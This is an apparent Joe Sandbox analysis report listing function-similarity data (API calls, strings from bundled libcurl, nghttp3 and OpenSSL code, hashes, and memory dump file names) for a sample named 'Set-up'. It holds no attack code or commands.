                                    • String ID:
                                    • API String ID: 1064163434-0
                                    • Opcode ID: eac37b74e3b4ff3d4e3aaf1cf760bd5ecc465001ffc576a18ed692ec35139852
                                    • Instruction ID: fc0305ef7851fb7c2ab38a94708979b08c082e5e6cd73726961d153433135e42
                                    • Opcode Fuzzy Hash: eac37b74e3b4ff3d4e3aaf1cf760bd5ecc465001ffc576a18ed692ec35139852
                                    • Instruction Fuzzy Hash: 6911A5B480A7119FD340AF2AD14462EFBE8FF98745F41881EE9C483341EB7498409FA3
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00CB5B6B,00000017,?,?), ref: 00CE4612
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00CE4660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errnomemchr
                                    • String ID: 0123456789ABCDEF$0123456789abcdef
                                    • API String ID: 4119152314-885041942
                                    • Opcode ID: ef654e891ff7d64514f36f0b9174c81a8aeacffbf7c74f6a9dda74f4281e8575
                                    • Instruction ID: f6c1819a2132ae77e585a22ef31d5fafe299b994d7987c893462c2dfefff7e26
                                    • Opcode Fuzzy Hash: ef654e891ff7d64514f36f0b9174c81a8aeacffbf7c74f6a9dda74f4281e8575
                                    • Instruction Fuzzy Hash: 5E91E571A083858BD72CDF2AC84026AB7D1AFD6314F198A2DE9E9C7381D7359E85C742
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CD225F
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CD22CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _time64strlen
                                    • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                                    • API String ID: 3014104814-1335658360
                                    • Opcode ID: 2d4cfe489dd0dafd1284f1bd0d7a201c772e3263e902015c563ed124e0922e99
                                    • Instruction ID: 91d0a15f458c18fb93263329f88c4395c3c560efbb27efc57f850523f0c99365
                                    • Opcode Fuzzy Hash: 2d4cfe489dd0dafd1284f1bd0d7a201c772e3263e902015c563ed124e0922e99
                                    • Instruction Fuzzy Hash: B6414971A003045BD7249A24DC85B7BB3D9EF94318F08853EEFAA87382E635ED45D751
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,00D30307,?), ref: 00D307AE
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D307C3
                                    Strings
                                    • nghttp3_qpack.c, xrefs: 00D307A4, 00D307B9
                                    • ctx->next_absidx > absidx, xrefs: 00D307A9
                                    • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 00D307BE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                                    • API String ID: 1222420520-241347991
                                    • Opcode ID: 369ade3b67b000c1a85c5de3be7b52c2b17bf0362b26c1ddd35e22faef4f04b6
                                    • Instruction ID: 1b2da80fcfef8548cb19b973bf77e129898da5a59dc6e0d877ff2d17162b5f90
                                    • Opcode Fuzzy Hash: 369ade3b67b000c1a85c5de3be7b52c2b17bf0362b26c1ddd35e22faef4f04b6
                                    • Instruction Fuzzy Hash: B931C7B57007105FD310EA29EC91E2B77D9FF99718F05852CF94587242E631B85587F1
                                    APIs
                                    • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00C95FB6,?), ref: 01004645
                                    • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 01004698
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,012FF8F8), ref: 01004744
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 01004762
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _stat64$fclosefopen
                                    • String ID: ../list/public_suffix_list.dat
                                    • API String ID: 1085753941-141370353
                                    • Opcode ID: 2cbeecc3ab04d3af509da740e8ea6f704e0fc940c47c922b941315326de3b4f2
                                    • Instruction ID: 1b31e47cc5d42d6862cb8c67d2cccd88f53c07728b710c6c036f0a5984fa7e81
                                    • Opcode Fuzzy Hash: 2cbeecc3ab04d3af509da740e8ea6f704e0fc940c47c922b941315326de3b4f2
                                    • Instruction Fuzzy Hash: FC417EB29083419BE701CF18D98075ABBE9BB85744F15493DEAC8D7390E770E948CB97
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00D2EF0E,?), ref: 00D2EA23
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00D2EF0E,?), ref: 00D2EA38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
                                    • API String ID: 1222420520-1964160224
                                    • Opcode ID: 190e780b71201f2d3a3340dac768ba6654de6bd6fadb6677d9d7a741e8e891d5
                                    • Instruction ID: 597533590a0103a5cb8c6f4aad9c52afb22e1b15befdd64b3160fd1cc90cc5e9
                                    • Opcode Fuzzy Hash: 190e780b71201f2d3a3340dac768ba6654de6bd6fadb6677d9d7a741e8e891d5
                                    • Instruction Fuzzy Hash: A731BF72804305AFD710DE18EC85E9BB7BCFFA5758F048519F8985B242E730A984CBA2
                                    APIs
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CF2771
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _time64
                                    • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                                    • API String ID: 1670930206-2395985473
                                    • Opcode ID: 99779fe48b628a8d8f39e1db604035bfb18ac38b1c611d18bcfecc135888926c
                                    • Instruction ID: 8556a88fc7ae252f73ee6bca7679bbcb3cef8a66005d102e569dee765e70ab51
                                    • Opcode Fuzzy Hash: 99779fe48b628a8d8f39e1db604035bfb18ac38b1c611d18bcfecc135888926c
                                    • Instruction Fuzzy Hash: AD213EB1B007045FE768AA29EC05F7779DAEBC4304F18853DF549C72D2F571D9009662
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 00D26119
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 00D2612E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                                    • API String ID: 1222420520-3888743547
                                    • Opcode ID: ce80871b69736a675a1c480d0577e8af064ed993dea47d4e2342811420c91c9e
                                    • Instruction ID: 2cec62be27f398eabe8903ca3e2bb90fb65711642a629164309e7b880a49f5da
                                    • Opcode Fuzzy Hash: ce80871b69736a675a1c480d0577e8af064ed993dea47d4e2342811420c91c9e
                                    • Instruction Fuzzy Hash: A33136715043108FC704EF19E885A6AB7E4FFA831CF0986ACE98957211E632FD41CBA1
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,00D24D5A,00000000,?,000001F0), ref: 00D28861
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 00D28873
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
                                    • API String ID: 1222420520-3025919285
                                    • Opcode ID: 5002939f44379e8797e9c109548be74bd311d63c49fdf64d6faad7b036f7179c
                                    • Instruction ID: 2f0080aa9711ecb40226af2132eecef1153efd46f97e37ff50ab0558c7cd189c
                                    • Opcode Fuzzy Hash: 5002939f44379e8797e9c109548be74bd311d63c49fdf64d6faad7b036f7179c
                                    • Instruction Fuzzy Hash: C911E5B6A01622ABD600CE29FC81915F3A8FF61739B084628F814D3282DB30E821D7F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: application/octet-stream$formdata.c
                                    • API String ID: 0-1216067158
                                    • Opcode ID: a744dca3afa8dbbb1b2cb048d82bf2a73439c5268a92e64c14a74b1e048b57eb
                                    • Instruction ID: 56319604d6cf4516557837258c2fcfe90661b6ae50a3110993026e0cf98be02a
                                    • Opcode Fuzzy Hash: a744dca3afa8dbbb1b2cb048d82bf2a73439c5268a92e64c14a74b1e048b57eb
                                    • Instruction Fuzzy Hash: 8102D770A04B418FE729EF15C844727BBE17F5030CF28482DD89A87792E7B6E985C749
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00F246DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                                    • API String ID: 39653677-2338284442
                                    • Opcode ID: 91e65cfbb06f48776b7adb9a4cae593e0e720d11db61aedc7508e3309e6845ad
                                    • Instruction ID: 05fff24bc035e52b41955a0260f24a5fa40a03202e3e1083e4858b93cec47ca1
                                    • Opcode Fuzzy Hash: 91e65cfbb06f48776b7adb9a4cae593e0e720d11db61aedc7508e3309e6845ad
                                    • Instruction Fuzzy Hash: 01A10972F483256BD3206E54BD42B2F77D0AB95B14F44442CFA99AB3C2D6F8F8009697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .%lu$crypto/objects/obj_dat.c
                                    • API String ID: 0-3322715555
                                    • Opcode ID: 1697b576be4f74a1624274413c71998404571e54ad6f18ad3ecb7c73f5fd7936
                                    • Instruction ID: 46ed68d75f8d09c88e14b5cecc8c6c2af5bb573e5af512c51b1046a436975a62
                                    • Opcode Fuzzy Hash: 1697b576be4f74a1624274413c71998404571e54ad6f18ad3ecb7c73f5fd7936
                                    • Instruction Fuzzy Hash: 57A1D3B1A083019BE7149E25995072BB7E5AFD0708F18E92EEE8CA7341EB71DC059793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
